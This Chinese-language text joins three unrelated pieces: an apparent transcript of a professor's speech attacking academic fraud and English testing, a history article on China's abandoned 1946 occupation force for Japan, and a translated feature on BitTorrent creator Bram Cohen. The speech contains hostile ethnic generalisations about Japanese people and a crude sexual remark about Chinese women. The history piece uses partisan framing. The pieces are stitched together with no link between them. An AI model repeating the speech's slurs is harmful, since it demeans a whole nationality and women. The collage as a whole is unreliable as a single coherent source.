“以前说”无知无畏”,现在却是”无知才无畏”,许多企业把浙江省技术监督局、科委的人请来吃一顿饭,喝一点酒,他就给你签个字,再把我们这些教授胁迫到那里去,给你盖个章,然后就是”填补国内外空白”、”国际先进水平”,写论文则是”国际领先水平的研究成果”、”首次科学发现”等等,这都是目前非常严重的问题!作为一个大学教授,我深深地为此担忧!这不是我们的责任,是我们的领导无知,是他们倡导了这个主流.我知道在座的处长或老总日子很难过,因为你们不写这样的报表,就拿不到钱,项目就得不到批准.教授也同样如此,天天写报告,而不是在实验室静下心来好好搞研究,这是很严重的!”

“我们国家的现实和发展就是这样:凡是依赖不成的,我们自己都能搞得像模像样,比如 二弹一星;凡是能够引进的,就都搞不成……现在很多合资企业就这样,卖点东西,而没有去考虑这些深层次的东西.殊不知,这就是社会的恶性循环!”

“我认为:语言、计算机就是工具.中国的外语教授讲英语还不如美国卖菜的农民!怎么看待这个问题?日本博士、德国教授说不出英语的多得是!我们怎么能说一个人不会说英语就是文盲呢?语言就是一个工具!你没有那个环境,他怎么能讲这个语言呢?……如果我是教育部长,我要改革二件事:第一,取消六级考试,你一个研究生连中文一级都不及格,你英文考六级干什么呢?看看研究生写得论文,自己的民族文化都没有学好,天天考英语──打勾:托福打勾,gre打勾,英文考出很高的分,可哪个写的英文论文在我面前过得了关呢?过不了关!这样培养出来的人能干什么?自己搞的专业一点都没学好!……说不会计算机就是文盲,这又是一个误区!我现在是教授,我顾 不上搞计算机!”

“你看我,从高中开始学英语,大学学,硕士学,博士学,花了我多少精力!你说中国人怎么做得出高科技的研究成果?我这几天就教训我手下的几位女学生,问她们在干什么,看不到人影,一天到晚考这样、考那样的,到美国去干什么?在国内要干的事多着呢!你整天考英语,美国人连报个名都要收你们的钱,日本人也是如此,中国学生到日本去要交手续费,到日本留学是为日本人打工,好不容易挣点钱交了学费,读完博士在日本的公司就职,当劳动力,挣了一笔钱后要回国了就买了家电,把钱全给了日本人.你们都没 有注意这件事,这里面都是经济问题.这就是素质教育到底是什么.”

“中小学的教育就是听话,老师管干部,干部管同学,孩子们都学会了成年化的处世方式,这是害人啊!这样强迫性地做了一些好事后,没有把做好事与做人准则结合起来去培养,而只学会了拍马屁、讨老师喜欢、说成人话.上次电视上就曾经播出,一个小孩得了个奖,主诗人问他最愿意说什么,他说:”我最愿意跟江爷爷说:我向你报告!””江爷爷”是谁?还不是老师教的!孩子们在中小学活得很累,到了大学就没人管了,所以就要玩、就要谈恋爱.”

“我们有很多同学成绩好,却什么都做不了.在我们大学像我这种程度的人,招博士生是从来不看成绩的,成绩算什么!现在我从事的这个领域在中国有叁个杰出的人才,当初在读研究生时都补考过,而成绩考得好的几个人却都跑到美国去卖中药了,这说明了什么问题?作老板的可不能这样啊!……人才的梯队一定要合理,而不要认为教授就是万能的、博士就是万能的.中国的教育体系就是让每一个老百姓都充满希望和理想,教育孩子们要树立远大的理想.实际上,人的能力是不一样的,扫地能扫好,也应该受到尊重;打扫厕所能打扫干净,也应该受到尊重,不能动不动就要高学历.我要提醒的是:在国外可不是这样,美国、日本的博士就很难找到工作,为什么?因为老板心疼钱,招了博士要给他高工资,而他能做什么用呢?这是个具体问题.”

“科技到底该干什么?高科技到底该干什么?如果我是科技部长,该玩的就玩,就像陈景润,他就是玩!陈景润如果是处在今天的中国,他绝对是要去讨饭的,因为他不会去搞产业化,他的英语也不好,他说话都不流利,中文都讲不好,按现在”标准”,他是个文盲,还谈什么教授!日本人就是喜欢美国人,我跟日本人说:你们这个民族爱谁,谁就要向你们扔原子弹.日本人就是喜欢黑人也不喜欢中国人…….我特别对我们的女教授、女同学说:在日本人面前一句日文都不要讲,会也不要讲;日本人一听说你讲英文,特别是看到中国女孩讲英文,腿都要发软,这是真的!”

“中国人为什么这些年都往外跑,最重要的是要让国民自己爱自己国家…….如果我是杭州的市长,我绝对不是狭隘的民族自尊心──如果杭州有什么灾难,我就首先把杭州的老百姓安排在香格里拉,让外国人在外面排队!(掌声!)这样,你才会让你的国民爱自己的国家!一个日本的农民跑到峨嵋山去玩,骨头摔断了,你就用中国空军的直升飞机去救他,而在日本大学一名中国留学生在宿舍里死了7天才被发现;名古屋大学的一对中国博士夫妇和孩子误食有毒磨菇,孩子和母亲死了,父亲则是重症肝炎,在名古屋大学医学院的门诊室等了12个小时,也没有一个日本教授来看望!而你们为什么还要这么友好,以为自己很大度,实际上是被人家耻笑,笑你的无知!你们这个民族*!我们不能这样!我们的领导人跑到国外去访问,看到有几个人在欢迎他们,就感到挺有面子;而外国来了个什么人物,都是警车开道,这究竟是怎么回事?这让我们中国人感到是自豪还是悲哀?所有这些,对教育工作来讲,都是深层次的问题.所以我经常讲,我作为一位自然科学工作者,我教育我的学生,首先是学会做人,没有这些,你学了高分子,外语都是花架子,你不是一个完整的人!”

“一个观念或是一个问题:是不是技术越新越好?今天谈的就都是提醒大家的……技术并不是越新越好,技术要有储备.日本的企业现在卖的东西大都是10年或15年前的技术,好东西他不拿出来,他要等到现有的技术把成本收回并获得尽可能高额的利润以后才会拿出来.其次,我的对手什么时候推出新东西时,我才会出手.不要以为你今天好不容易搞了生产线,明天又有新的了,你的钱还没赚到就换新的,有什么用?我这次到日本刚好谈到悬浮列车──即使何先生在我也要说,这是中国人又在玩高新科技.悬浮列车目前在理论上都还不成熟.日本现在最完善,最经济的就是新干线! 从经济和市场的概念来讲,越先进的东西,风险越大,有可能得到的回报就越少!”

中国军队未能登上日本领土之谜

战后盟国安排美、英、中等国派兵占领日本

1945年8月15日日本投降后,美、苏、中、英等11个同盟国在华盛顿召开会议,决定由美国全权统一办理对日军事占领和日本的重建工作。同时苏、英、中等在反法西斯战争中作出重大贡献的国家,也应派军队对日本进行占领。

早在日本投降之前,美国就已确定了单独占领日本的方针。美国总统杜鲁门说:“对日本的占领不能重蹈德国的覆辙。我不打算分割管制或划分占领区。”他还说:“不容俄国控制日本的任何部分。”

8月11日,美国断然拒绝了苏联提出的由美苏分任占领区总司令的要求。8月13日,美国太平洋盟军总司令道格拉斯·麦克阿瑟被任命为占领日本的盟军总司令。

随后由中、美、英、苏四国成立管制委员会,对日本实行管制。虽然四国都被称为占领国家,实际上占领日本的是美国。英国所派军队不过3000人,而中国也只派了少量军队,二者都受美军控制。美国对苏联很戒备,一开始就没有邀请它派兵参加。

8月14日,杜鲁门总统发布了《一般命令第一号》,划分日军向盟国的各受降区域。其中日本本土以及邻近各岛屿、北纬38度以南的朝鲜、琉球群岛和菲律宾群岛的日本军队,向美国太平洋陆军司令官投降,这样美国在战争一结束就为自己完全控制日本创造了有利条件。

8月15日,日本宣布无条件投降后,按照盟国商定的结果,盟军总司令部设在东京,中、美、英开始准备分别派出武装部队进驻日本。

急于扬眉吐气的中国国民党政府表现还算积极,立即派出以朱世明为团长的“中国军事代表团”率先赴日熟悉情况。8月28日,美军先遣部队也到达厚木机场。30日,麦克阿瑟乘“巴丹”号军用飞机抵达日本。

10月,美国以公文形式致电中国政府,约请中国派一支5万人的军队协助盟国占领日本,并希望由参加过印缅远征作战的孙立人统领的新一军去。然 而,当时蒋介石正指挥国民党军队忙于抢占抗战的胜利果实,已经把最精锐的新一军派往东北,根本没有太多的兵力派到国外,因此只想派出一支5000人的部队 象征性地去日本。可是美国一再要求中国至少要派遣一个师。最后,蒋介石决定由曾在越南河内担任接受日本投降任务的荣誉一师和荣誉二师合编成的六十七师前 往。

进驻日本的中国军人要求五官端正、身高1.70米以上、小学以上文化,连以上军官还要进行交谊舞培训。

当时荣誉二师正在卢汉的指挥下执行北纬16度以北地区日本侵略者的受降任务,他接到国民政府的驻日占领任务后,立即把荣誉二师与荣誉一师整编成 六十七师。荣誉二师系蒋介石嫡系部队,师长戴坚,少将军衔。该师建制完整,兵员充足,有精良的美式装备,是当时较为理想的赴日部队。

该师于1946年2月得到命令后,立即海运至上海江湾驻扎,等待坐飞机到日本。在此期间,该师进行了严格整训,淘汰老、弱、矮、丑的官兵,并从 其他部队中选调五官端正、身高1.70米以上、具有小学以上文化程度的兵员进行补充。整训待命期间,部队特别进行了军容仪表和国际交往礼节的课目训练,连 以上军官甚至还进行吃西餐和跳交谊舞方面的训练。

5月,中国驻日占领军先遣人员、国民党上校参谋廖季威同国民党第六十七师师长戴坚等人从上海乘坐B—24重型轰炸机前往日本同美军商谈中国驻军地点问题。到达后,根据协商,中国占领军驻扎在日本爱知县,必要时再扩大到三重县和静冈县。

当时第六十七师编制为14500人,有步兵团3个、炮兵团1个、运输团1个,此外还有战车、工兵、通信等营各1个,驻扎日本后,将隶属美国第八集团军第一军团指挥。从1946年5月开始,国民党驻日本先遣人员在横滨不断与美军联系驻军的编制、装备以及车辆运输等问题。

6月初,国民党政府国防部发布命令:占领军先遣队正式进驻日本。出国之日,国内各新闻机构都作了大量的宣传报道,《大公报》、《新闻报》、《中 华时报》、《自由中国》等均热情地报道了这一具有历史意义的、扬眉吐气的历史事件,有的报纸甚至将占领军人员全部名单及军衔广为刊载。这些内容在日本也同 时见报,造成很大的政治影响。

6月中旬,先遣队由“中国驻日军事代表团”团长朱世明率领,从上海龙华机场空运直达日本羽田机场,而后由陆路转赴先遣队驻地名古屋。日本当地政 府对先遣队的到来侍应恭谨。为了给即将抵达日本的第六十七师设营布防,先遣队在名古屋全面部署和接收了占领军所需的营房、仓库、港口、车场以及游乐场所等 设施

 

 

蒋介石打内战使占领军进驻日本化为泡影

就在中国驻日占领军大部队正在准备进驻日本的时候,蒋介石也正在为发动全面内战做准备。1946年6月18日,蒋介石发布密令,电告郑州绥靖公署主任刘峙,要他调集部队,围歼李先念部,并命令其攻击部队于6月26日前秘密完成包围之势。

6月26日,刘峙统率30万大军,向宣化店地区的中共军队发起进攻,点燃了全面内战的战火。

与此同时,农历七月初一,驻日先遣队准备工作已基本完成,随后朱世明电告南京政府,请调“中国驻日占领军”出发正式进驻日本。

然而,自电报发出之后,国民党政府应拨给驻日占领军的后勤物资依然迟迟不能到位,这令朱世明焦急万分,经去信确认才知道这些物资早已分发至反共 战场。几天后,朱世明突然接到国民政府来电,要求先遣人员立即全部返回,且驻扎上海机场的驻日占领军已经接到命令,将投入到反共战场,而驻扎在上海的六十 七师也已奉命开往苏鲁豫解放区。

国民党政府还告知朱世明,国军只要在鲁南或江苏泰兴地区一得手,即可将第六十七师调回并按原计划进驻日本。

第六十七师到达苏中之后,被收编到第一绥靖区司令官汤恩伯(7月中旬由李默庵担任)所在部队的第六十五和六十九师。1946年7月6日14时, 汤恩伯发布进攻黄桥、姜堰、海安的命令。我华中野战军在粟裕和谭震林的指挥下,经过一个半月的战斗,一举击溃国民党的进攻。其中,原第六十七师所在部队到 达海安、如皋一带不久,就遭到我华东野战军的重创。

8月28日,粟裕、谭震林所在的华中野战军发来电报,向中共中央和毛主席汇报了刚刚结束的苏鲁豫解放区战果,内容涉及到编在增援部队中的六十七 师的伤亡情况。电报称:我军于26日在如皋西南地区歼灭六十九师之九十九旅后,又于27日在上述地区歼灭由如皋来援之敌六十五师之一八七旅及七十九师一个 团,第二次由如皋增援之一个团亦被歼一半。

至此,原来的第六十七师、准备派到日本的驻日占领军就这样覆灭在反人民的战场上。

日本人个个衣衫褴褛,男男女女提着破皮包或布包低头疾走,听不见人声笑语。他们在盟军占领人员面前低声下气,一看到插着中、英、美、苏四国旗帜的车辆就点头哈腰

在六十七师无法到达日本后,国民党政府只好保留了先遣的驻日军事代表团。中国驻日代表团机构有办公厅,下设4个组、7个处,此外还有宪兵40 人。代表团总部设在日本东京都的麻布区。团长最初为朱世明,后改由商震担任,最后由何世礼担任,他们都是军人,副团长是沈觐鼎,时称首席顾问。

中国驻日代表团的性质虽是外交机构,但因当时中日没有邦交,即使在私人之间,原则上也不能随便来往,必须得到“盟军总部”的允许。美国驻日占领 军的最高统帅麦克阿瑟同时又是盟军最高统帅,盟军总司令部实际上成了美军总部,在占领日本期间,任何问题,中方均需向美国交涉,才有希望得到解决。

中国驻日代表团虽然受制于美国,但他们还是感受到了在日本国土上作为战胜国所受到的尊敬。据当时跟踪驻日军事代表团报道的重庆《东南日报》名记 者赵浩生回忆,中国作为战胜国之一,其驻日军事代表团的工作人员在日本享有各种特权。在神户,工作人员下榻的神户大厦是专门用来接待占领国人员的。从神户 到东京的火车也有占领国人员的专用车厢。到了东京,住进“外人记者俱乐部”,更是进入了特权阶层。这些待遇都是日本平民乃至大部分官员们所无法享受的。

赵浩生回忆说,当时的日本,从东京到横滨,已经变成了一片废墟瓦砾。日本人个个衣衫褴褛,很少看到穿皮鞋的。即使在商业中心银座和最拥挤的东京 车站,也只是见到男男女女提着破皮包或布包低头疾走,听不见人声笑语,只有一片沉重的木屐声。他们在盟军占领人员面前显得低声下气,在街上一看到插着中、 英、美、苏四国旗帜的车辆就点头哈腰,给人的感觉好像是真的无条件投降了。一些了解日本国民性的中国军事代表团成员分析说,日本是个非常讲究现实的国家, 胜了,它就耀武扬威、作威作福;败了,它便俯首称臣。当时工作人员在日本看到的现象的确如此。

可惜的是,作为战胜国最重要体现的中国军队没有进驻日本,这使得中国对日本的管制缺乏威慑力和强制力,也使得后来中国试图限制日本并要求其彻底反思战争罪行的愿望没有实现,而美国对日本军国主义体制的改造也很不彻底,这些都给今天的世界造成了很大的隐患

BT之父的辛酸奋斗血泪史

在一家又一家注定要倒闭的dot-com公司工作过之后,一位名叫Bram Cohen的年轻程序员最终厌倦了这种失败的生活。

“最终我认为我想做一些人们会实际用到的、有用的并且有趣的项目。”他回忆到。

3年后,28岁的Cohen成为了下一波互联网文件共享风潮的掌门人。如果说Napster是文件交换的第一浪,像Kazaa这样的文件交换网络则代表了第二浪。那么,由Cohen开发的BitTorrent将会引领文件交换的第三浪——目前BitTorrent实际的用户难以估量,但是BitTorrent这个软件至少被下载了超过1000万次。

在早期形式的文件交换网络被唱片业穷追猛打以致步向衰落的同时,像BitTorrent这样的新技术的出现,使得用于视频的大文件的共享和分发 变得更加容易。例如,光是suprnova.org这样的一个网站,就能提供上百套电视节目、最新电影以及版权软件。这甚至令到一向在打击互联网文件交换 中不太积极的电影工业也开始提高警惕。

BT之父 Bram Cohen

然而,Cohen对他所创造的这个系统早已经失去了控制。他表示,当他开发这个系统的时候,大规模的侵犯版权问题是他没有想到的。相反,他开发 这个系统的初衷,是为了使人们在购买合法在线音乐时,不需要再经历那漫长的等待。“很明显,他们的问题在于没有足够的带宽来满足人们的需要。”Cohen 在接受采访时称,“我很清楚,实际上有很多的带宽摆在那里,但是它没有被恰当的使用。还有许多上传容量是人们没用到的。”

这就是BitTorrent背后的本质。在像Napster和Kazaa这样旧有的文件共享系统下,实际上只有一小部分人把文件向世人分享,大 部分用户都只是简单地下载。然而BitTorrent则使用了所谓的Golden Rule原理:你上传的速度越快,你下载的速度就越快。BitTorrent把文件分割成许多小块,当一个用户下载了某一小块时,它就会立即把这一小块上 传给其它用户。因此,所有的用户在下载的同时,也在把自己已下载部分上传给他人。BitTorrent的这种工作原理,使得做“种子”的用户只需少许带 宽,就可以把大文件共享给大量的下载者。

BitTorrent对于Cohen来说,一直是一种脑力训练而不是一种赚钱的途径。不像其它文件交换程序,BitTorrent不但是免费的,而且还是开源的。这意味着只要有足够能力,你完全可以把BitTorrent融入到你自己的程序里面。

BitTorrent的第一个可用版本出现在2002年10月,不过这个版本还有许多要改进的地方。然而,Cohen此时却在为生计发愁。幸运 的是,BitTorrent引起了著名免费软件企业家John Gilmore的注意。Gilmore帮助Cohen解决了部分的生活费用,使得BitTorrent免遭夭折。

BitTorrent真正流行起来是在2003年初,它被用来发布一个新版的Linux。与此同时,还有一些日本卡通的fans凭籍它来共享动画片。

很难衡量BitTorrent的总体使用情况。但是Internet2主干网基础构造的主管Steven C. Corbato表示,他在去年5月份开始就注意到,BitTorrent的流量开始激增。从10月份开始,BitTorrent的流量更是超过了这个超高 速网络总体流量的10%。与之对比,其它的文件交换系统的流量没有一个能超过Internet2总体流量的1%。Internet2又称Abilene主 干,它连接起了美国200多所规模最大的大学,速度比现时的ADSL要快3500多倍。

尽管BitTorrent获得了如此巨大的成功,然而直到几个月前,它并没有为Cohen带来过一分钱。“去年9月份我没有一丁点钱,”Cohen回忆到,他当时只好利用这张信用卡的免息期来透支,填补另一张信用卡的帐单来过活。

Cohen那时并不知道,BitTorrent会为他带来一份工作。某天,他的事情为Valve软件公司的常务董事Gabe Newell所获悉。尽管Valve正在开发令游戏玩家望眼欲穿的Half-Life 2,但是它同时也在建立一个名为Steam的在线分发网络。由于Cohen掌握这个领域的专门技术,所以Valve为他提供了一个职位。Cohen从十月 份起搬到西雅图,开始了他的工作。

一直以来,Cohen都有通过他的网站bitconjurer.org来接受BitTorrent用户的捐款,但是这笔金额一直很少。然而从10月份开始,Cohen父亲鼓励他请求的更直接一点。如今,Cohen称,他每天都能收到上百美元的捐款。

“在过去的几个月,我的生活方式发生了相当戏剧性的变化,获得工作还有捐款的到来,”Cohen说,“这好极了。”

根据Pew Internet和American Life Project的调查数据显示,文件交换正在衰落,这显然是唱片业起诉运动的结果。在去年5月,29%美国的成年互联网用户表示他们参与了文件交换。而到 了11月和12月份,这个数字已经跌到了14%。但是,BitTorrent的忠实用户——无论是卡通狂热爱好者、Linux用户、盗版电影的观赏者—— 似乎在不断增加。

BitTorrent的用户中有不少人对Cohen心怀感激,但是毫不奇怪,电影工业的圈内人不在此列。“BitTorrent决对是处在我们 的雷达防线以内。”美国电影协会的主管Tom Temple在一次电话访问中表示。BitTorrent的迅猛普及,促使该协会开始向BitTorrent站点的管理人发出了侵权通知。

“我们正在调查大量的BitTorrent链接网站,在不久的将来我们可能会向某些站点提出民事或刑事起诉。”Temple称。

对此,Cohen指出,BitTorrent的用户是非匿名的,他们的互联网IP地址很容易就能被看到。“这令我很吃惊,像Suprnova这样的网站竟然能够继续生存,因为他们很容易就会被起诉。”Cohen称。Cohen还补充说,使用BitTorrent来进行非法交易,是“很愚蠢的,因为它不是匿名的。而且由于基层结构的关系,它也不能被改成匿名的。

这就是说,Cohen并不支持许多BitTorrent站点的做法。

“我不打算拿出傲慢的态度,告诉其它人不该怎么做,因为斥责他人的事情与我无关。”他说,“我是以那种找乐子的心态来看待这件事的。”

 

原文出自:纽约时报 | 中文翻译原文刊登网站:太平洋电脑网
P.S. :  BT是用python语言写成的,详细的源码可以到sourceforge.net下载。